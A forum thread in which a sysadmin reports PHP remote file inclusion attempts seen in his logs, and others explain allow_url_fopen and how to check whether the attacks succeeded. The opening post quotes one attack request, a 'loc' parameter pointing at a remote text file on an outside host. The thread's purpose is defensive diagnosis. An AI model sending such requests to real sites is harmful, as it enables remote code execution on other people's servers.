PHP security/vulnerability

[teqmod]

Hi all, let me start with I know next to nothing about PHP but I am seeing some very suspicious activity in our logs. What I am seeing is a bunch of hits similar to this:

http://www.mysite.com/page.php

loc=

http://pornsite.chat.ru/images/image.txt?

My thought is someone is using our site as a proxy to another site where they are either blocked or illegal images are being accessed. I have checked the source IP addresses for the suspicious activity and they are all over the place. Is this something that can be stopped? Is it stopped through PHP or IIS. We are using PHP version 5.0.3

Any information on this would be very helpful.

thanks

 

[jpadie]

unless there is something in page.php that is causing the redirect to this porn site, i doubt whether anything is actually happening. what is on page.php?

 

[teqmod]

We do not have any redirects away from our site and there is no advertising.

I actually think I have found the problem. Here is an article that closely resembles what I am seeing.

http://lwn.net/Articles/203904/

 

[jpadie]

do you perform remote includes from a GET variable? does anyone (wow)?

 

[teqmod]

Unfortunately I do not know this. I do know that we are not pulling anything from the remote hosts that are referenced in our logs. From what I can tell from our logs and how much web traffic has increased that something is not right.

 

[Sleidia]

I think you should ask directly to your host.
They will be able to tell you whether it is harmless or not.

 

[jpadie]

the easy way to tell whether this is just harmless try-ons or not is to emulate some of the requests being made of your site. see whether they take you somewhere they should not, or - if they are remote exploits - foot print your code to see what might be happening.

we can help here if you show us the receiving code.

take a look at phpsec.org for best practice on securing your application.

 

[teqmod]

We host our own site here so there really is no one else to ask. I am the SysAdmin in charge of hte outward facing systems and knoe that we have no legitimate direct link to these other sites. I am fairly certain after my research in the logs this is not legitimate traffic and people are exploiting a vulnerability.

Here are a couple sites on this exact error and I have confirmed a setting is open in the config. I need to verify with the developer this will not hinder the site if we change the settings.


Here is the link to the SANS posting on PHP vulnerabilities:

http://isc.sans.org/diary.html?storyid=2462

and one article summarizing the vulnerability in detail:

http://lwn.net/Articles/203904/

 

[jpadie]

'exploiting a vulnerability' means that you think that the perps are successful. how are you determining this? I get 100 or so similar exploits on some of my upload sites each day, but none are ever succesful.

remember that any attempt to exploit the vulnerability will be logged in the exact format that you post about (as the exploit starts with a get request). you will need, most probably, to do some analysis of the firewall (outbound) logs to determine whether any of the vulnerabilities are successful.

the status of allow_url_fopen is not a security hole unless you couple it with a script that uses unfiltered query data. Personally, I think this would be very unusual as it would be a truly 'schoolboy' error.